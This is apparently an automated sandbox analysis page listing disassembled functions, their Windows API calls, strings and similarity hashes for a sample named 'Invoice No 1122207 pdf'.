Function 004A8D0E Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00429BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00429BB2

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004A8D5A
GetFocus.USER32 ref: 004A8D6A
GetDlgCtrlID.USER32(00000000), ref: 004A8D75
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 004A8E1D
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 004A8ECF
GetMenuItemCount.USER32(?), ref: 004A8EEC
GetMenuItemID.USER32(?,00000000), ref: 004A8EFC
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 004A8F2E
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 004A8F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004A8FA1

Strings

0, xrefs: 004A8E9F

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: e923fae9f0ad55202d40f049de807e8734f3dc4903a5df925262ecf829377197
Instruction ID: a1483002659df2c769b64139de1c9b98ef7785f78553308075a25c6b183a3a62
Opcode Fuzzy Hash: e923fae9f0ad55202d40f049de807e8734f3dc4903a5df925262ecf829377197
Instruction Fuzzy Hash: 2C81B371504311AFDB10CF24D884A6BBBE9FFAA314F14092EF985D7291DB78D901CB69

Function 0047DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0047DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0047DC46
_wcslen.LIBCMT ref: 0047DC50
_wcsstr.LIBVCRUNTIME ref: 0047DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0047DCBC

Strings

DefaultLangCodepage, xrefs: 0047DD1F
StringFileInfo\, xrefs: 0047DC8F
\VarFileInfo\Translation, xrefs: 0047DCB4
%u.%u.%u.%u, xrefs: 0047DD9A
04090000, xrefs: 0047DCF2

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: 85e54b021032779bd38df2f846b5533c4148d20e56878c4b4f9f4b40953ec8cc
Instruction ID: b3fee1bfc6078b955bec20cc79ca37a490acab5d2dd6c5a520f950a9bc8bd273
Opcode Fuzzy Hash: 85e54b021032779bd38df2f846b5533c4148d20e56878c4b4f9f4b40953ec8cc
Instruction Fuzzy Hash: A8412432A402107ADB15A661AC83FFF37BCDF5A714F50406FF904A2182EB7DA90197AD

Function 0049CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0049CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0049CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0049CD48

Part of subcall function 0049CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0049CCAA
Part of subcall function 0049CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0049CCBD
Part of subcall function 0049CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0049CCCF
Part of subcall function 0049CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0049CD05
Part of subcall function 0049CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0049CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0049CCF3

Strings

RegDeleteKeyExW, xrefs: 0049CCC9
advapi32.dll, xrefs: 0049CCB8

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 96e21358bb9ea3f98390cb7f73ff936c887cce294f6a27e653639b81f8fa2f58
Instruction ID: 7538443a2070a75c8f6738d5cf86d3d8f676141747eedc8856924e3f1a3f32c1
Opcode Fuzzy Hash: 96e21358bb9ea3f98390cb7f73ff936c887cce294f6a27e653639b81f8fa2f58
Instruction Fuzzy Hash: 1B316071A41129BBDB209B95DCC8EFFBF7CEF46754F000176F905E2240D6389E459AA8

Function 00483D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00483D40
_wcslen.LIBCMT ref: 00483D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00483D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00483DBE
RemoveDirectoryW.KERNEL32(?), ref: 00483DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00483E55
CloseHandle.KERNEL32(00000000), ref: 00483E60
CloseHandle.KERNEL32(00000000), ref: 00483E6B

Strings

\, xrefs: 00483D77
:, xrefs: 00483D82
\??\%s, xrefs: 00483D5B

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 80ac30bf395c0d8dca7af9d18548eadca34b56373005702233e20461d83ba766
Instruction ID: 01218be2fc8f2de56f93013dde21c61150c6cbe48c7afecb1293de8e9cae7b58
Opcode Fuzzy Hash: 80ac30bf395c0d8dca7af9d18548eadca34b56373005702233e20461d83ba766
Instruction Fuzzy Hash: 6B31B6729001096BDB21AFA0DC85FEF37BCEF89B05F1044B6F905D6150EB7897458B28

Function 0047E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0047E6B4

Part of subcall function 0042E551: timeGetTime.WINMM(?,?,0047E6D4), ref: 0042E555

Sleep.KERNEL32(0000000A), ref: 0047E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0047E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0047E727
SetActiveWindow.USER32 ref: 0047E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0047E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0047E773
Sleep.KERNEL32(000000FA), ref: 0047E77E
IsWindow.USER32 ref: 0047E78A
EndDialog.USER32(00000000), ref: 0047E79B

Strings

BUTTON, xrefs: 0047E719

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 0ce4e31316d84ee1a9df28ce108d7ae3b03154ccf470b9ad86f47536e608884c
Instruction ID: 494c76b985108189b84701e682c771b886766d41e0b061f8c7d00f00864028ea
Opcode Fuzzy Hash: 0ce4e31316d84ee1a9df28ce108d7ae3b03154ccf470b9ad86f47536e608884c
Instruction Fuzzy Hash: 0121D4B0200244AFEB105F36EDC9A663F6DF71A349F108676F409952B2DBB5AC009A2C

Function 0047E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0047EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0047EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0047EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0047EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0047EAA7

Strings

close PlayMe, xrefs: 0047EA6E, 0047EA9B
play PlayMe wait, xrefs: 0047EA91
status PlayMe mode, xrefs: 0047EA58
open , xrefs: 0047EA0C
play PlayMe, xrefs: 0047EAA2
alias PlayMe, xrefs: 0047EA36

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 6233b801245afd3006beec0398b7d8a4bd8c2a315b781256c45c981a8f19acc4
Instruction ID: 185efa22bfd07092d35c6ad2d555b2b30407d90891556a1a8f714cf41da1f940
Opcode Fuzzy Hash: 6233b801245afd3006beec0398b7d8a4bd8c2a315b781256c45c981a8f19acc4
Instruction Fuzzy Hash: 6E11E370A9021979D720A7A2DC6AEFF6B7CEBC1F04F10046BB801A21D0EE781D45C9B8

Function 00475CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00475CE2
GetWindowRect.USER32(00000000,?), ref: 00475CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00475D59
GetDlgItem.USER32(?,00000002), ref: 00475D69
GetWindowRect.USER32(00000000,?), ref: 00475D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00475DCF
GetDlgItem.USER32(?,000003E9), ref: 00475DDD
GetWindowRect.USER32(00000000,?), ref: 00475DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00475E31
GetDlgItem.USER32(?,000003EA), ref: 00475E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00475E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00475E67

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 85fce70f1bc3c6a58b00dbe9f269ff0012521eeb4d645d9ced75c338d75638a7
Instruction ID: 7af9dc3cde50717f7a15d0e0f9f9ffc130238e322a778124ca07208abb8f559d
Opcode Fuzzy Hash: 85fce70f1bc3c6a58b00dbe9f269ff0012521eeb4d645d9ced75c338d75638a7
Instruction Fuzzy Hash: 3C510E71B00605AFDF18CFA8DD89AAEBBB5FB48300F548129F519E7290D7749E04CB54

Function 00428BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00428F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00428BE8,?,00000000,?,?,?,?,00428BBA,00000000,?), ref: 00428FC5

DestroyWindow.USER32(?), ref: 00428C81
KillTimer.USER32(00000000,?,?,?,?,00428BBA,00000000,?), ref: 00428D1B
DestroyAcceleratorTable.USER32(00000000), ref: 00466973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00428BBA,00000000,?), ref: 004669A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00428BBA,00000000,?), ref: 004669B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00428BBA,00000000), ref: 004669D4
DeleteObject.GDI32(00000000), ref: 004669E6

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: d312ec482637de34eab6c8cb0abf800ef1d87be553b45fe41c1f9b4440f380c5
Instruction ID: 6c6c78c700273877c720b5be97dd70d0af4906cd395b8db5d91e4763b518ce99
Opcode Fuzzy Hash: d312ec482637de34eab6c8cb0abf800ef1d87be553b45fe41c1f9b4440f380c5
Instruction Fuzzy Hash: FA61C170202620DFDB219F15EA88B2A7BF1FB41316F55452EE0429B671CB39AC81CF9D

Function 00429838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00429944: GetWindowLongW.USER32(?,000000EB), ref: 00429952

GetSysColor.USER32(0000000F), ref: 00429862

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 5a4886a40c9aaeaf3bb6ae34570c01d04d3e4fd7cde98486b7776afaba0a22ec
Instruction ID: f874ee9d2f2be3fd10760c2b7717790b9c456f1175dcccdab44d2fb6697bf3e7
Opcode Fuzzy Hash: 5a4886a40c9aaeaf3bb6ae34570c01d04d3e4fd7cde98486b7776afaba0a22ec
Instruction Fuzzy Hash: 1741FA31600650AFDB206F38AC84BBA3B65EB17330F584656F9A2873E2D7349C42DB19

Function 00448D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Strings

.C, xrefs: 0044903A, 00448FD0, 00448FF2

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID: .C
API String ID: 0-1181961956
Opcode ID: 9b58f5dabe3077509171e732bff81eb824458f57b6083445ac5ab056f66e97ef
Instruction ID: eb9610bd3511200ec6d90fa95a5c7e010e857ca5343351805dd7b5ce85707d63
Opcode Fuzzy Hash: 9b58f5dabe3077509171e732bff81eb824458f57b6083445ac5ab056f66e97ef
Instruction Fuzzy Hash: 1EC1F474D04249AFEF11DFA9D841BAFBBB0AF09314F14409AF814A7392C7798D42DB69

Function 004796E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0045F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00479717
LoadStringW.USER32(00000000,?,0045F7F8,00000001), ref: 00479720

Part of subcall function 00419CB3: _wcslen.LIBCMT ref: 00419CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0045F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00479742
LoadStringW.USER32(00000000,?,0045F7F8,00000001), ref: 00479745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00479866

Strings

Line %d:, xrefs: 004797A0
Error: , xrefs: 0047981D
Line %d (File "%s"):, xrefs: 0047978F
^ ERROR, xrefs: 004797FB
%s (%d) : ==> %s: %s %s, xrefs: 0047984A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 1d52193deaaa36976a57a22f99a9bb1f49f7e1a2b4e6e44cf2a1cf60e247affc
Instruction ID: 47649ed6707ce6315a6fb9766a92006ead74d56158a65ab5c8854d2702f008b9
Opcode Fuzzy Hash: 1d52193deaaa36976a57a22f99a9bb1f49f7e1a2b4e6e44cf2a1cf60e247affc
Instruction Fuzzy Hash: A1416572800119AADF04FBE1CD96DEE7778AF15744F50402BF60572192EB396F88CB69

Function 00493C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00493C5C
CoInitialize.OLE32(00000000), ref: 00493C8A
CoUninitialize.OLE32 ref: 00493C94
_wcslen.LIBCMT ref: 00493D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00493DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00493ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00493F0E
CoGetObject.OLE32(?,00000000,004AFB98,?), ref: 00493F2D
SetErrorMode.KERNEL32(00000000), ref: 00493F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00493FC4
VariantClear.OLEAUT32(?), ref: 00493FD8

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: bd28a41bbed7338230c01f431dd6a8a5859c679330a8b047e730b4abd573d918
Instruction ID: f46ce77e6ea40ec39aeecf3c65ce7f6ba73e3857271a89658ab5552a3a1d6a17
Opcode Fuzzy Hash: bd28a41bbed7338230c01f431dd6a8a5859c679330a8b047e730b4abd573d918
Instruction Fuzzy Hash: 23C158716083059FCB00DF65C88496BBBE9FF8A749F00496EF98A9B210D734EE05CB56

Function 00487A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00487AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00487B8F
SHGetDesktopFolder.SHELL32(?), ref: 00487BA3
CoCreateInstance.OLE32(004AFD08,00000000,00000001,004D6E6C,?), ref: 00487BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00487C74
CoTaskMemFree.OLE32(?,?), ref: 00487CCC
SHBrowseForFolderW.SHELL32(?), ref: 00487D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00487D7A
CoTaskMemFree.OLE32(00000000), ref: 00487D81
CoTaskMemFree.OLE32(00000000), ref: 00487DD6
CoUninitialize.OLE32 ref: 00487DDC

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: f208699d339ff3022175d497d9f328e7947ba1413cf4e6dad4e80f1e43f13feb
Instruction ID: 88d8fb7e9a5a88090902244ea6af08d937b7dc800ece08ee49cd5c22bb9600be
Opcode Fuzzy Hash: f208699d339ff3022175d497d9f328e7947ba1413cf4e6dad4e80f1e43f13feb
Instruction Fuzzy Hash: 73C13D75A04105AFCB14EFA4C894DAEBBF9FF48308B1484A9E81ADB361D734ED41CB94

Function 004A541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 004A5504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004A5515
CharNextW.USER32(00000158), ref: 004A5544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 004A5585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 004A559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004A55AC

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 2efb1f7c96c8081bb18d15c9847767f811f787cce9b19fadcfeee2f16e489ed0
Instruction ID: 886126b4b6221783a70d92fb59f16fe1a659533b40aeb0ed112194b5baff34cd
Opcode Fuzzy Hash: 2efb1f7c96c8081bb18d15c9847767f811f787cce9b19fadcfeee2f16e489ed0
Instruction Fuzzy Hash: F161BE71900608FBDF10DF54CD84AFF3BB9EB2B320F104156F925AA291D7388A81DB69

Function 0046FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0046FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0046FB08
VariantInit.OLEAUT32(?), ref: 0046FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0046FB3A
VariantCopy.OLEAUT32(?,?), ref: 0046FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0046FBA1
VariantClear.OLEAUT32(?), ref: 0046FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0046FBC3
